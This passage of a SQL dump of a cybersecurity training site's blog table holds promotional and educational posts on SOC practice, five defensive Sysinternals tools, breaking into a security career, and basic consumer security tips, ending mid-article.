class=\"font-bold\">InfosecLabs SOC Environment</strong></b> isn’t just a learning tool—it\'s an immersive experience in a true security operations center environment. You won’t just practice about tools like Splunk or CrowdStrike; you’ll master them in-depth, preparing yourself to tackle the challenges of a real SOC analyst role.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This experience is invaluable for developing the problem-solving, teamwork, and technical skills employers demand. You’ll gain deep insights into incident response plans, communication protocols, and decision-making processes—things that simply can’t be learned from textbooks or online courses.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Hands-On Learning Matters More Than Ever</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape is increasingly complex and dynamic, requiring professionals to adapt to evolving threats and technologies. Hands-on practice offers a unique opportunity to build the skills necessary for success, including:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Real-World Problem Solving</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learn how to diagnose and resolve issues quickly and effectively.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Confidence</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Feel prepared to manage incidents and tools under pressure.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Immediate Value for Employers</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Stand out from other candidates by demonstrating proficiency from day one.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Kickstart Your Cybersecurity Career</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity industry is competitive, but <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> gives you the practice opportunity you need to succeed. By combining theoretical knowledge with expert-guided, hands-on practice, you’ll equip yourself for the diverse challenges of the field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re serious about landing your first job as a SOC analyst—or taking the next big step in your career—practical training through InfosecLabs could be the game-changing opportunity you’ve been waiting for.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><a href=\"https://infoseclabs.io/start\" target=\"_blank\" rel=\"noopener\"><b><strong class=\"font-bold\">Start Practicing Today</strong></b></a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The path to a brighter and more secure future starts now. Take the next step in your cybersecurity career by signing up for the <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> today. Enhance your skills, gain practical experience, and build the confidence needed to excel in one of the most dynamic fields in tech.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your future in cybersecurity awaits. Start your hands-on training now and stand out in a competitive job market.</p>', '', NULL, NULL, 1, 'draft', '2025-02-03 20:03:42', '2026-01-12 21:41:44', 'Information Security', 'Why Practice is Essential to Master Cybersecurity', '', NULL),
(50, '5 Must-Know Sysinternals Tools for Cybersecurity Professionals', '5-must-know-sysinternals-tools-for-cybersecurity-professionals', '# Mastering Sysinternals: Essential Tools for Cybersecurity Professionals\n\nWhen it comes to safeguarding systems and detecting threats, the right tools can make all the difference. Sysinternals, a suite of utilities developed by Microsoft, offers powerful tools for managing, troubleshooting, and securing Windows environments. Whether you\'re new to cybersecurity or an experienced professional, understanding and leveraging these tools is essential. Here\'s a breakdown of five key Sysinternals tools that every cybersecurity learner and professional should master, along with detailed use cases to help you get started.\n\n## 1. Process Explorer\n\n### Purpose\n\nProcess Explorer is an advanced task manager that provides deep visibility into running processes, their dependencies, and system performance.\n\n### Key Features\n\n- Detailed process tree view.\n- Information on parent-child process relationships.\n- Insights into resource usage, threads, and handles.\n\n### Use Cases\n\n- **Identifying Malicious Processes**: Detect suspicious or malicious processes by analyzing digital signatures, parent-child relationships, and unusual resource consumption.\n- **DLL Injection Detection**: Identify injected dynamic link libraries (DLLs) that may compromise system security.\n- **Troubleshooting Resource Overuse**: Pinpoint processes that are causing high CPU, memory, or I/O usage, helping keep systems optimized.\n\n### How Process Explorer Helps\n\nThis tool is invaluable for spotting anomalies in your system. For example, if a process with an unverified signature or high CPU usage stands out, it may point to malware activity that requires immediate attention.\n\n## 2. Autoruns\n\n### Purpose\n\nAutoruns provides a comprehensive view of all startup programs, services, and other auto-start entries on a system.\n\n### Key Features\n\n- Displays all auto-start entries, including registry entries, scheduled tasks, and services.\n- Allows users to disable unnecessary or malicious startup items.\n\n### Use Cases\n\n- **Malware Persistence Investigation**: Detect unauthorized executables or scripts configured to launch at system startup. This helps identify malware designed to survive reboots.\n- **System Cleanup**: Optimize system performance and security by disabling unnecessary or unauthorized startup entries.\n\n### How Autoruns Helps\n\nFor cybersecurity learners, Autoruns highlights how threat actors establish persistence. Practice reviewing entries and identifying suspicious items to build your skills in analyzing potential security risks.\n\n## 3. TCPView\n\n### Purpose\n\nTCPView simplifies real-time monitoring of active TCP/UDP connections, providing insights into which processes are communicating over the network.\n\n### Key Features\n\n- Live tracking of all active network connections.\n- Mapping of network activity to specific processes and endpoints.\n\n### Use Cases\n\n- **Network Threat Detection**: Monitor live connections to identify unauthorized or suspicious activity, such as unexpected connections to unknown IP addresses.\n- **Incident Response**: Determine which network connections are involved in data exfiltration attempts or command-and-control (C2) communications during an attack.\n\n### How TCPView Helps\n\nTCPView is critical for cybersecurity professionals focused on network security. By becoming proficient with this tool, you’ll gain the ability to track threats, analyze connections, and identify compromised endpoints quickly.\n\n## 4. Sysmon (System Monitor)\n\n### Purpose\n\nSysmon delivers detailed logging of system events, such as process creation, network connections, and file operations. Its high-fidelity logs are a treasure trove for advanced threat detection and forensic investigations.\n\n### Key Features\n\n- Tracks key system events like file creation, registry modifications, and network communication.\n- Generates logs that can be fed into SIEM or other threat detection platforms.\n\n### Use Cases\n\n- **Advanced Threat Hunting**: Record detailed activity logs and analyze these to track attacker behavior, including lateral movement or privilege escalation.\n- **Endpoint Monitoring**: Provide your SIEM tools with robust logs for correlating suspicious activities and detecting anomalies.\n\n### How Sysmon Helps\n\nUnderstanding Sysmon\'s configuration is essential. For beginners, start by configuring it to log events like process creation and network activity. This hands-on practice is key to mastering threat hunting and network defense.\n\n## 5. PsExec\n\n### Purpose\n\nPsExec is a versatile tool for executing commands or scripts on remote systems, offering cybersecurity professionals powerful remote administration capabilities.\n\n### Key Features\n\n- Enables control of remote systems without requiring interactive logins.\n- Ideal for executing scripts and batch files at scale.\n\n### Use Cases\n\n- **Patch Deployment**: Streamline the installation of security patches across multiple systems, ensuring enterprise-wide protection against vulnerabilities.\n- **Incident Response**: Remotely collect forensic data from compromised systems, disable malicious processes, or execute clean-up scripts.\n\n### How PsExec Helps\n\nFor learners, mastering PsExec is invaluable for managing systems across networks. Learning to deploy patches or execute commands remotely is an essential skill for administering and securing large environments.', '', 'http://infoseclabs.io/uploads/1773587128156-577726583.jpg', 'Cybersecurity professional using Sysinternals tools on a computer', 1, 'published', '2026-03-15 09:16:00', '2026-03-15 19:07:57', 'Information Security', 'Top 5 Sysinternals Tools for Cybersecurity Pros', 'Discover essential Sysinternals tools for managing, troubleshooting, and securing Windows environments in cybersecurity.', 'Sysinternals tools'),
(51, 'Break Into Cybersecurity and Overcome Rejections', 'break-into-cybersecurity-and-overcome-rejections', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Breaking into cybersecurity can be challenging, especially if you\'re just starting out and facing rejection after rejection. The good news? You don’t need ten certifications or years of experience to succeed. What you really need is persistence, a hunger to learn, and the right mindset.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From complete beginners to career changers, countless professionals have launched their dream cybersecurity careers by following these six proven principles. If you’re ready to build your future in this exciting field, this guide is your blueprint.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Hustle for Opportunities</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Landing a cybersecurity job isn’t about waiting for the perfect listing to pop up—it’s about being proactive. You need to create opportunities by putting yourself out there and staying visible to potential employers.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Hustle Tactics to Try:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Send personalized LinkedIn messages to cybersecurity professionals.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Reach out directly to hiring managers or team leaders.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Attend networking events, webinars, and cybersecurity conferences.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Follow up on applications instead of waiting for responses.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One aspiring cybersecurity analyst sent over <b><strong class=\"font-bold\">many connection requests on LinkedIn</strong></b>. After weeks of rejections, she finally landed an interview and secured a role in one of the best company\'s security team.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Networking and visibility are game-changers. Consistently reaching out keeps you on recruiters’ radar, opening doors to opportunities others may miss.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Learn from Failures</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Rejections are tough—but they’re also invaluable lessons. Each “no” is a chance to refine your skills, improve your approach, and get closer to your dream job.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Learn from Rejections:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Analyze why you weren’t selected—lack of skills? Weak interview? Missing certifications?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Focus on plugging those gaps with study, practice, or mentorship.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Treat each rejection as data to improve your strategy.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity professional failed <b><strong class=\"font-bold\">two certification exams</strong></b> and was rejected after five interviews. Instead of giving up, they identified weaknesses, improved their interview skills, and earned certifications—all within six months. Now, they\'re thriving at a leading security firm.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Failures are stepping stones. Use them to prepare for bigger challenges and opportunities ahead.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ignore the Naysayers</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">“You don’t have enough experience.\" \"Cybersecurity is too competitive.\" If you’re pursuing a career in cybersecurity, you’ve probably heard it all before. The truth is, pursuing your goals often means going against the doubters.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Stay Motivated:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Focus on your long-term dreams, not opinions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Surround yourself with supportive individuals, like mentors or online cybersecurity communities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use negativity as fuel for your determination.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A career changer began studying cybersecurity at the age of 55, despite being told it was “too late.” Through persistence and rigorous learning, they built an impressive skill set and now lead the security team at a global corporation.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Block out the doubters. Stay focused, determined, and prove them wrong.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Put in the Hard Work</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity rewards diligence and structure more than shortcuts. The most successful candidates dedicate consistent effort to building their skills and portfolios.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Work Smarter:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Dedicate specific hours daily to study or hands-on labs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Develop a portfolio of projects that showcase your skills.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Learn through practical resources like simulated labs and training platforms (check out <b><strong class=\"font-bold\">InfosecLabs</strong></b> for top-notch tools).</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One candidate spent <b><strong class=\"font-bold\">two hours every day</strong></b> on hands-on labs and building a portfolio. Nine months later, their portfolio helped secure a dream role. It showcased their talent and stood out to recruiters.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Success in cybersecurity requires discipline. Stay consistent, track your progress, and showcase tangible results.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Give Back to the Community</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a collaborative field where helping others enhances your own knowledge and reputation. Sharing your expertise or supporting peers creates opportunities you might not expect.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ways to Give Back:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Participate in online communities like Reddit, Discord, or LinkedIn cybersecurity groups.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Share educational content, such as tutorials, blog posts, or videos.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Mentor others who are new to cybersecurity.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Trust Yourself</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Impostor syndrome is common in cybersecurity—it’s easy to feel like you don’t know enough or don’t belong. The reality? No one knows everything, and growth comes from a willingness to learn.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Build Confidence:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Focus on your progress, not perfection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Adopt a mindset where each challenge is an opportunity to grow.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Remember that even the top cybersecurity experts started from scratch.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One beginner struggled with self-doubt but committed to a daily learning schedule. With time and experience, confidence came naturally—and they landed an advanced cybersecurity role.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Believe in your ability to adapt and learn. Confidence will grow with every milestone you achieve.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Launch Your Cybersecurity Career Today</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Breaking into cybersecurity can be intimidating, but it’s absolutely achievable if you commit to these six rules. From hustling for opportunities to fostering self-confidence, each step gets you closer to your goal.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, every rejection is one step closer to success. Stay persistent, keep learning, and believe in your potential—the cybersecurity world needs driven individuals like you.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re ready to elevate your skills, explore <b><strong class=\"font-bold\">InfosecLabs</strong></b>. Our platform provides hands-on tools, expert-curated labs, and community support to help you kickstart your dream career.</p>', '', NULL, NULL, 1, 'draft', '2025-02-01 00:19:46', '2026-01-12 21:41:44', 'Information Security', 'Break Into Cybersecurity and Overcome Rejections', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(52, '7 Cybersecurity Tips Easy to Do', '7-cybersecurity-tips-easy-to-do', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When it comes to protecting yourself online, many people stick to the basics—strong passwords, two-factor authentication (2FA), and using a VPN. But did you know there are other simple and highly effective cybersecurity practices that often go unnoticed? These methods can protect your information, prevent data breaches, and safeguard your identity online. Let\'s explore these seven underrated yet easy-to-implement cybersecurity tips.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use a Separate Email for Sensitive Activities</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Create a dedicated email address specifically for your financial accounts, such as banking, investments, or other high-priority accounts. This makes it harder for phishing attacks to succeed, as hackers won\'t know which email address is linked to your sensitive activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your primary email, which is widely used for subscriptions, communication, or online registrations, is more likely to end up in the hands of bad actors. By using a \"secret\" email that you don\'t share publicly, you minimize the risk of scammers accessing important accounts through phishing emails.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create a new email account using a secure provider like Gmail, ProtonMail, or Tutanota.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Update email settings in your financial accounts to use this new address exclusively.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Use Virtual Credit Cards for Online Transactions</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtual credit cards are an excellent way to protect your financial information when shopping online. They generate a unique card number for each transaction, which hides your real card details from merchants.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if a hacker breaches a merchant’s database, your real credit card information remains safe. Virtual cards also allow you to set limits, making it harder for unauthorized charges to occur.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use services like Privacy.com or your bank\'s virtual card feature.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Replace your physical card details with a virtual card for online purchases.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Use Tap-to-Pay Instead of Physical Cards</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re still swiping or inserting your credit card at payment terminals, it’s time to switch to tap-to-pay technology. Services like Apple Pay or Google Pay tokenize your card details, creating a secure layer between you and the merchant.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tap-to-pay ensures that your actual credit card number is never shared with merchants. Instead, a temporary token is used for the transaction, protecting your data from being stolen.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Add your credit card to the wallet app on your smartphone or smartwatch.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use the tap-to-pay feature at stores, cafés, 